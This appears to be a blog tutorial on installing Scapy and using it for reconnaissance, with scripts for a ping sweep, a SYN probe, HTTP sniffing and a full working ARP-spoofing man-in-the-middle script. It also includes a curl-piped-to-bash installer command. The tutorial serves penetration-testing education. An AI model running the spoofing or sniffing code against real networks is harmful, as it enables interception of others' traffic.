Installing and Using Scapy for Active Reconnaissance in Penetration Testing

Scapy is a powerful Python-based interactive packet manipulation program and library. It is widely used in penetration testing and network analysis due to its flexibility and ease of use. This blog post will guide you through the installation of Scapy on various operating systems and demonstrate its usage in penetration testing with practical examples.

Installation of Scapy

1. Windows:

To install Scapy on Windows, follow these steps:

1. Install Python: Download and install Python from the official website. Ensure you check the option to add Python to your PATH during installation.

2. Install Scapy: Open Command Prompt and run:

   pip install scapy
   

2. macOS:

To install Scapy on macOS, follow these steps:

1. Install Homebrew: If you don’t have Homebrew installed, open Terminal and run:

   /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
   

2. Install Python: Use Homebrew to install Python:

   brew install python
   

3. Install Scapy: Finally, install Scapy using pip:

   pip install scapy
   

3. Linux:

To install Scapy on Linux, follow these steps:

1. Install Python and Pip: Open Terminal and run:

   sudo apt-get update
   sudo apt-get install python3 python3-pip
   

2. Install Scapy: Use pip to install Scapy:

   pip3 install scapy
   

Using Scapy in Penetration Testing

Scapy can be used for various tasks in penetration testing, such as network scanning, packet crafting, and sniffing. Here are some practical examples:

1. Network Scanning:

Scapy can be used to perform network scans to discover active hosts and open ports. Here’s a simple example of a ping sweep to discover active hosts in a subnet:

from scapy.all import *

# Define the subnet
subnet = "192.168.1.0/24"

# Perform the ping sweep
ans, unans = sr(IP(dst=subnet)/ICMP(), timeout=2)

# Print the results
for snd, rcv in ans:
    print(rcv.sprintf(r"%IP.src% is alive"))

2. Packet Crafting:

Scapy allows you to craft custom packets for testing purposes. For example, you can create a TCP SYN packet to test a specific port on a target host:

from scapy.all import *

# Define the target IP and port
target_ip = "192.168.1.10"
target_port = 80

# Craft the TCP SYN packet
syn_packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")

# Send the packet and receive the response
response = sr1(syn_packet, timeout=2)

# Print the response
if response:
    response.show()
else:
    print("No response received")

3. Packet Sniffing:

Scapy can also be used to sniff network traffic. Here’s an example of how to capture and display HTTP packets:

from scapy.all import *

# Define the packet filter
filter = "tcp port 80"

# Define the packet handler function
def packet_handler(packet):
    if packet.haslayer(Raw):
        print(packet[Raw].load)

# Start sniffing
sniff(filter=filter, prn=packet_handler, store=0)
Understanding ARP Spoofing

ARP (Address Resolution Protocol) is used to map IP addresses to MAC addresses. In ARP spoofing, an attacker sends forged ARP messages to a local network, causing devices to associate the attacker’s MAC address with the IP address of another device (such as the gateway). This allows the attacker to intercept, modify, or block traffic.

Setting Up ARP Spoofing

1. Identify Target and Gateway:

First, identify the IP addresses of the target device and the gateway (router). You can use tools like ipconfig (Windows) or ifconfig (Linux/macOS) to find this information.

2. Enable IP Forwarding:

To ensure that the intercepted traffic is forwarded to the actual gateway, enable IP forwarding on your machine:

• Windows:

  netsh interface ipv4 set interface "Local Area Connection" forwarding=enabled
  

• Linux:

  echo 1 > /proc/sys/net/ipv4/ip_forward
  

• macOS:

  sysctl -w net.inet.ip.forwarding=1
  

3. Perform ARP Spoofing:

Here’s a Python script using Scapy to perform ARP spoofing:

from scapy.all import *
import time

# Define the target and gateway IP addresses
target_ip = "192.168.1.5"
gateway_ip = "192.168.1.1"

# Get the MAC address of the target and gateway
def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = srp(arp_request_broadcast, timeout=5, verbose=False)[0]
    return answered_list[0][1].hwsrc

target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)

# Spoof the target and gateway
def spoof(target_ip, spoof_ip, target_mac):
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    send(packet, verbose=False)

# Restore the network
def restore(target_ip, spoof_ip, target_mac, spoof_mac):
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
    send(packet, count=4, verbose=False)

try:
    print("[*] Starting ARP spoofing...")
    while True:
        spoof(target_ip, gateway_ip, target_mac)
        spoof(gateway_ip, target_ip, gateway_mac)
        time.sleep(2)
except KeyboardInterrupt:
    print("[*] Stopping ARP spoofing...")
    restore(target_ip, gateway_ip, target_mac, gateway_mac)
    restore(gateway_ip, target_ip, gateway_mac, target_mac)
    print("[*] Network restored.")

Explanation:

1. Get MAC Addresses: The get_mac function sends an ARP request to get the MAC address of the target and gateway.

2. Spoofing: The spoof function sends fake ARP responses to the target and gateway, associating the attacker’s MAC address with the IP addresses of the gateway and target, respectively.

3. Restoring the Network: The restore function sends correct ARP responses to restore the network to its original state when the attack is stopped.

Conclusion

ARP spoofing with Scapy is a powerful technique for intercepting network traffic. However, it should be used responsibly and only in environments where you have permission to perform such activities. Understanding and practicing these techniques can help you better secure your own networks against similar attacks.